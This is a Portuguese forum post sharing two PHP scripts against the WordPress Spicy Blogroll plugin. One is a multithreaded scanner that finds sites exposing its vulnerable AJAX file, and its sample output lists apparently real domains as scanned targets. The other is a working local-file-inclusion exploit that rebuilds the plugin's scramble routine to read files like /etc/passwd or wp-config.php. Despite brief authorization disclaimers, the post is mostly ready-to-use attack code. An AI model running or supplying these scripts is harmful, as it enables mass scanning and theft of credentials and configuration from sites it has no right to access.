Olá a todos!
Escrevi este script que tem como função verificar a existência do plugin Spicy Blogroll: ele requisita /wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php em cada host da lista e considera positivo qualquer resposta cujo corpo contenha o texto "require_once". Isso indica apenas que o arquivo respondeu com esse texto, não que a versão instalada seja vulnerável — podem ocorrer falsos positivos.
Após isto é possível efetuar um LFI (local file inclusion) nos hosts encontrados com a ajuda do xpl automatizado abaixo. Use apenas contra hosts que você tem autorização para testar.
Output:
n4sss@blue-wind:~/lov3/Scripts/n4sss/spicy$ php spicy_blogroll.php
php spicy_blogroll.php url_list.txt log.txt threads
Please set the url list with http://
Example:
php spicy_blogroll.php wps.txt ok.txt 20
by n4sss
php spicy_blogroll.php url_list.txt log.txt threads
Please set the url list with http://
Example:
php spicy_blogroll.php wps.txt ok.txt 20
by n4sss
Código PHP:
<?php
/*
* Wordpress Plugin Spicy Blogroll File Inclusion Vulnerability
* Verifier by n4sss.
*
* poc:
* http://www.exploit-db.com/exploits/26804/
*
* Details:
* File: /wp-content/plugins/spicy-blogroll-ajax.php
* SVN Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll-ajax.php
*
* n4sss@blue-wind:~/lov3/Scripts/n4sss/spicy$ php spicy_blogroll.php wp.txt log.txt 10
* Simple Spicy Blogroll plagin Check with multithreaded by n4sss
* Wait the get_content
* ---------------------------------------
* Total urls loadeds:1477
* Total threads: 10
* Log to save: log.txt
* ---------------------------------------
* [0] http://pipocaestudio.com.br
* [1] http://da0ra.com
* [2] http://tsiuniao.com.br
* [3] http://airtonfarias.com
* [4] http://casadacaubi.com.br
* [5] http://linhaca.net
* [6] http://dicasdecontabilidade.com.br
* [7] http://linhaca.net
* [8] http://whatisproductmarketing.com
* ----------------------------------------------------
* spicy-blogroll found => http://whatisproductmarketing.com
* Saving to log.txt
* ----------------------------------------------------
* [9] http://zeroseteum.com.br
* [10] http://atmasurfboards.com.br
* --------------------------------------
*
* http://Janissaries.org
* 2013
*
*
* */
// NOTE(review): this silences every warning and notice for the whole run,
// including a failed fopen() in save() or a rejected cURL option — failures
// become invisible to the operator. Consider lifting it while debugging.
error_reporting(0);
// A scan of a long list must not be cut off by max_execution_time.
set_time_limit(0);
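/**
 * Write one line (terminated with CRLF) to a file.
 *
 * @param string $content Text to write; "\r\n" is appended.
 * @param string $file    Path of the file to open.
 * @param string $mode    fopen() mode, e.g. "a" to append or "w" to truncate.
 * @return bool true when the line was written, false when the file could not
 *              be opened or written. The original ignored both failures and
 *              the caller kept printing "Saving to ..." with nothing saved.
 */
function save($content, $file, $mode)
{
    // fopen() emits a warning on failure; it is suppressed here because the
    // failure is reported through the return value (and logged) instead.
    $fp = @fopen($file, $mode);
    if ($fp === false) {
        error_log("save(): could not open $file (mode $mode)");
        return false;
    }
    $written = fwrite($fp, $content . "\r\n");
    fclose($fp);
    return $written !== false;
}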
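/**
 * Probe every entry of $url for the Spicy Blogroll AJAX endpoint and log hits.
 *
 * Hosts are requested in batches of $th parallel cURL handles. A host is
 * reported as "found" when the body returned for
 * /wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php contains the
 * literal text "require_once" (the fingerprint chosen by the original author;
 * presumably the PHP warning the plugin emits when called without parameters,
 * which would mean it only works on targets that display errors — TODO confirm).
 * Any page that happens to contain that token is a false positive, and a hit
 * only shows the file is reachable, not that the installed version is
 * vulnerable. No HTTP status or redirect handling is performed.
 *
 * Only scan hosts you are authorised to test.
 *
 * @param string[]   $url Base URLs including scheme ("http://host"), one per element.
 * @param string     $log Path of the log file hits are appended to via save().
 * @param int|string $th  Parallel requests per batch; values below 1 are clamped to 1.
 * @return void
 */
function verify($url, $log, $th)
{
    $path = "/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php";
    // array_chunk() rejects a size of 0 (ValueError on PHP 8), so clamp it.
    $batchSize = max(1, (int) $th);
    $multi = curl_multi_init();
    $offset = 0; // position in $url of the first element of the current batch

    foreach (array_chunk($url, $batchSize) as $batch) {
        // Fresh handle table per batch. The original reused one array across
        // batches, so a shorter final batch also re-read the stale handles of
        // the previous one (duplicate or empty "found" lines, bogus log entries).
        $handles = array();
        foreach ($batch as $i => $base) {
            // Strip "\r" / blanks left over from the input file; an empty entry
            // would otherwise turn into a request for the bare plugin path.
            $base = trim($base);
            if ($base === '') {
                print "[" . ($offset + $i) . "] (skipped empty entry)\n";
                continue;
            }
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $base . $path);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
            curl_setopt($ch, CURLOPT_TIMEOUT, 10);
            curl_multi_add_handle($multi, $ch);
            $handles[$i] = array($ch, $base);
        }

        // Drive all transfers of the batch to completion. curl_multi_select()
        // blocks until there is socket activity instead of the original
        // usleep(1) busy loop.
        do {
            $status = curl_multi_exec($multi, $running);
            if ($running > 0) {
                curl_multi_select($multi, 1.0);
            }
        } while ($running > 0 && ($status == CURLM_OK || $status == CURLM_CALL_MULTI_PERFORM));

        foreach ($handles as $i => $pair) {
            list($ch, $base) = $pair;
            $body = curl_multi_getcontent($ch);
            curl_multi_remove_handle($multi, $ch);
            curl_close($ch); // the original never closed its easy handles
            print "[" . ($offset + $i) . "] $base\n";
            if (is_string($body) && preg_match('#require_once()#si', $body)) {
                print "----------------------------------------------------\n";
                print "spicy-blogroll found => $base\n";
                print "Saving to $log\n";
                print "----------------------------------------------------\n";
                // save() may report failure via a false return; the original
                // announced "Saving to ..." regardless of whether it worked.
                if (save("-------------------------\n$base\n------------------------", "$log", "a") === false) {
                    print "Could not write to $log\n";
                }
                flush();
            }
        }
        $offset += count($batch);
    }
    curl_multi_close($multi);
}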
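// ---------------------------------------------------------------------------
// Entry point: php spicy_blogroll.php <url_list.txt> <log.txt> <threads>
// ---------------------------------------------------------------------------
// isset() instead of the original truthiness test, so an argument of "0" is
// not mistaken for a missing one.
if (!isset($argv[1], $argv[2], $argv[3])) {
    print "php $argv[0] url_list.txt log.txt threads\n";
    print "Please set the url list with http:// :) \n";
    print "Example:\n";
    print "php $argv[0] wps.txt ok.txt 20\n";
    print "by n4sss\n";
    exit(1); // usage error: non-zero so shell callers can detect it
}

// file() yields one element per line without the newline. The original
// explode("\n", ...) kept the trailing "\r" of CRLF files (breaking the URL)
// and an empty last element (inflating the count and producing a request to
// the bare plugin path). Lines that are only whitespace are dropped as well.
$url = @file($argv[1], FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if ($url === false) {
    fwrite(STDERR, "Cannot read url list: $argv[1]\n");
    exit(1);
}
$url = array_values(array_filter(array_map('trim', $url), 'strlen'));

$log = $argv[2];
// verify() chunks the list by this size; 0 or garbage would make it fail.
$th = max(1, (int) trim($argv[3]));

print "Simple Spicy Blogroll plagin Check with multithreaded by n4sss\n";
print "Wait the get_content \n";
print "---------------------------------------\n";
print "Total urls loadeds: " . count($url) . "\n";
print "Total threads: $th\n";
print "Log to save: $log\n";
print "---------------------------------------\n";
sleep(5); // gives the operator a moment to abort before any request is sent
verify($url, $log, $th);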
?>
Uso:
php spicy_xpl.php <host> <path> <file>
Código PHP:
<?php
// Title: Wordpress Plugin Spicy Blogroll File Inclusion Vulnerability
// Date: 12-07-2013 (GMT+8 Kuala Lumpur)
// Author: Ahlspiess
// Greetz: All TBDIAN - http://w3.tbd.my :)
// Screenshot: http://i.imgur.com/jIrUznC.png
/**
Details:
File: /wp-content/plugins/spicy-blogroll-ajax.php
SVN Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll-ajax.php
<?php
...
...
$link_url = $_GET['link_url'];
$link_text = $_GET['link_text'];
$var2 = unscramble($_GET['var2']);
$var3 = unscramble($_GET['var3']);
$var4 = unscramble($_GET['var4']);
$var5 = unscramble($_GET['var5']);
$nonce = unscramble($_GET['var11']);
require_once($var2.$var4); <-- Boom
...
...
*/
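// Usage: php spicy_xpl.php <host> <path> <file>
//   host  target hostname (no scheme; plain http:// is used)
//   path  WordPress install path on that host, starting with "/" ("" for the web root)
//   file  server-side file to include, e.g. /etc/passwd or ../../wp-config.php
// Only run this against systems you are authorised to test.
if (!isset($argv[3])) {
    die(sprintf("php %s <host> <path> <file>\n", $argv[0]));
}
list(, $host, $path, $file) = $argv;
$vfile = 'http://%s%s/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=%s&var4=%s';
// The plugin does require_once($var2.$var4), so var2 carries the directory
// (with trailing slash) and var4 the file name. scramble() shifts each byte
// by ±1 and inserts padding, so its output may contain '&', '#', '+', '%' or
// control characters; unencoded, those corrupt the query string (the original
// sent them raw). PHP url-decodes $_GET before unscramble() sees the value,
// so rawurlencode() is transparent to the server side.
$request = sprintf(
    $vfile,
    $host,
    $path,
    rawurlencode(scramble(dirname($file) . "/")),
    rawurlencode(scramble(basename($file)))
);
$opts = array(
    'http' => array(
        'header' => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0",
        'ignore_errors' => true, // keep the body on 4xx/5xx so error output is still shown
        'timeout' => 15,         // do not hang indefinitely on an unresponsive host
    )
);
$context = stream_context_create($opts);
$body = file_get_contents($request, false, $context);
if ($body === false) {
    // The original echoed nothing on failure, which is indistinguishable
    // from an empty response.
    fwrite(STDERR, "request failed: $request\n");
    exit(1);
}
echo $body;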
/**
Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll.php
Line: 386-401
*/
/**
 * Client-side copy of the plugin's scramble() (spicy-blogroll.php, lines
 * 386-401). The output must be byte-for-byte what the server's unscramble()
 * expects, so the algorithm — including its oddities — is reproduced as is.
 *
 * Layout: a two-character prefix derived from $rng, then each input byte
 * shifted alternately by -seed/+seed (seed is 1 or 2), with a random
 * lowercase letter (or '{') inserted after every byte whose running counter
 * satisfies counter % 5 == rng % 2.
 *
 * @param string $text1 Plaintext to scramble.
 * @param int    $rng   Variant selector (the plugin calls it with 1).
 * @return string Scrambled text.
 */
function scramble($text1, $rng = 1)
{
    $parity = $rng % 2;
    // "$rn %= 2" in the original is a no-op on a value already in {-1,0,1}.
    $shift = $parity + 1;
    $counter = 7;
    $out = chr($shift + 64 + $rng) . chr($rng + 70);

    $length = strlen($text1);
    for ($pos = 0; $pos < $length; $pos++) {
        $shift = -$shift;
        $counter++;
        $code = ord($text1[$pos]) + $shift;
        if ($code == 92) {
            // String concatenation, not addition: "92" . "42" = "9242".
            // This matches the plugin's server-side code and must stay so.
            $code .= 42;
        }
        $out .= chr($code);
        if ($counter % 5 == $parity) {
            $out .= chr(mt_rand(97, 123));
        }
    }
    return $out;
}
?>
Vídeo de demonstração: http://www.youtube.com/watch?v=1DiZhD9HpsI
[]'s